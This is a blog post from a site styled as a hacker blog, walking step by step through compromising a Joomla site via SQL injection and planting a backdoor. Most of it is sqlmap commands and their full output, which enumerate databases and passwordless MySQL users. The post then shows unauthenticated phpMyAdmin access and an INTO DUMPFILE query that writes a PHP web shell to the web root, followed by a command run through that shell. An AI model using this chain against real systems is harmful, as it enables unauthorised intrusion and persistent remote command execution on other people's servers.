BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Monday, July 16, 2012

From SQL Injection to Backdoor Installation

0 comments

Imagine that our site is vulnerable to SQL Injection in the following link:
Select AllCode:
http://www.foo.org/index.php?option=com_aardvertiser&cat_name=user&task=view
Initially we will try to inject it by using sqlmap:
Select AllCode:
root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –dbs
 
[03:18:19] [WARNING] POST parameter ‘cat_name’ is not injectable
[03:18:19] [CRITICAL] all parameters appear to be not injectable. Try to increase –level/–risk values to perform more tests. Rerun by providing either a valid –string or a valid –regexp, refer to the user’s manual for details
 
[*] shutting down at: 03:18:19
All parameters appear to be not injectable, so we will set the appropriate values in level and risk arguments:
Select AllCode:
root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –dbs –level=5 –risk=3
 
[03:21:02] [INFO] checking if the injection point on POST parameter ‘cat_name’ is a false positive
POST parameter ‘cat_name’ is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 537 HTTP(s) requests:
—
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470′ OR NOT (1875=1875)# &task=view
—
[03:21:22] [INFO] manual usage of POST payloads requires url encoding
[03:21:22] [INFO] testing MySQL
[03:21:22] [INFO] confirming MySQL
[03:21:23] [INFO] the back-end DBMS is MySQL
-
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[03:21:23] [INFO] fetching database names
[03:21:23] [INFO] fetching number of databases
[03:21:23] [WARNING] running in a single-thread mode. please consider usage of –threads option to declare higher number of threads
[03:21:23] [INFO] retrieved: 6
[03:21:24] [INFO] retrieved: information_schema
[03:21:54] [INFO] retrieved: cdcol
[03:22:03] [INFO] retrieved: joomla
[03:22:14] [INFO] retrieved: mysql
[03:22:23] [INFO] retrieved: phpmyadmin
[03:22:40] [INFO] retrieved: test
available databases [6]:
[*] cdcol
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin
[*] test
 
[03:22:48] [INFO] Fetched data logged to text files under ‘/sqlmap/output/www.foo.org′
 
[*] shutting down at: 03:22:48
It’s time to search for mysql users and dump their hashes:
Select AllCode:
root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –level=5 –risk=3 –users –password
 
[03:23:37] [WARNING] the testable parameter ‘cat_name’ you provided is not inside the Cookie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
—
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470′ OR NOT (1875=1875)# &task=view
—
[03:23:37] [INFO] manual usage of POST payloads requires url encoding
[03:23:37] [INFO] the back-end DBMS is MySQL
 
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5
[03:23:37] [INFO] fetching database users
[03:23:37] [INFO] fetching number of database users
[03:23:37] [WARNING] running in a single-thread mode. please consider usage of –threads option to declare higher number of threads
[03:23:37] [INFO] retrieved: 5
[03:23:38] [INFO] retrieved: ‘root’@'localhost’
[03:24:06] [INFO] retrieved: ‘root’@'linux’
[03:24:28] [INFO] retrieved: ‘pma’@'localhost’
[03:24:54] [INFO] retrieved: ”@’localhost’
[03:25:16] [INFO] retrieved: ”@’linux’
database management system users [5]:
[*] ”@’linux’
[*] ”@’localhost’
[*] ‘pma’@'localhost’
[*] ‘root’@'linux’
[*] ‘root’@'localhost’
 
[03:25:33] [INFO] fetching database users password hashes
[03:25:33] [INFO] fetching database users
[03:25:33] [INFO] fetching number of password hashes for user ‘root’
[03:25:33] [INFO] retrieved: 1
[03:25:34] [INFO] fetching password hashes for user ‘root’
[03:25:34] [INFO] retrieved:
[03:25:35] [INFO] fetching number of password hashes for user ‘pma’
[03:25:35] [INFO] retrieved: 1
[03:25:37] [INFO] fetching password hashes for user ‘pma’
[03:25:37] [INFO] retrieved:
[03:25:38] [INFO] fetching number of password hashes for user ”
[03:25:38] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ”
[03:25:39] [INFO] fetching number of password hashes for user ”
[03:25:39] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ”
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[03:25:47] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[03:25:47] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [1]:
password hash: NULL
 
[03:25:47] [INFO] Fetched data logged to text files under ‘/sqlmap/output/www.foo.org′
 
[*] shutting down at: 03:25:47
Excellent, as we can see mysql server has two users without password. Next step is try to access the database using phpmyadmin (without credentials).
Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query:
Select AllCode:
select @@datadir;
/opt/lampp/var/mysql/
As we can see, the system uses xampp, and by default on xampp the web server’s directory is:
Select AllCode:
/opt/lampp/htdocs/
After gathering all the appropriate information we are ready to create our php backdoor by using the following sql query:
Select AllCode:
select “<?php system($_REQUEST['cmd']); ?>” into dumpfile ‘/opt/lampp/htdocs/cmd.php’ –;
Let’s test our backdoor:
Select AllCode:
http://www.foo.org/cmd.php?cmd=id
 
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Voila!

©2012, copyright BLACK BURN

0 comments:

Post a Comment

 

7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email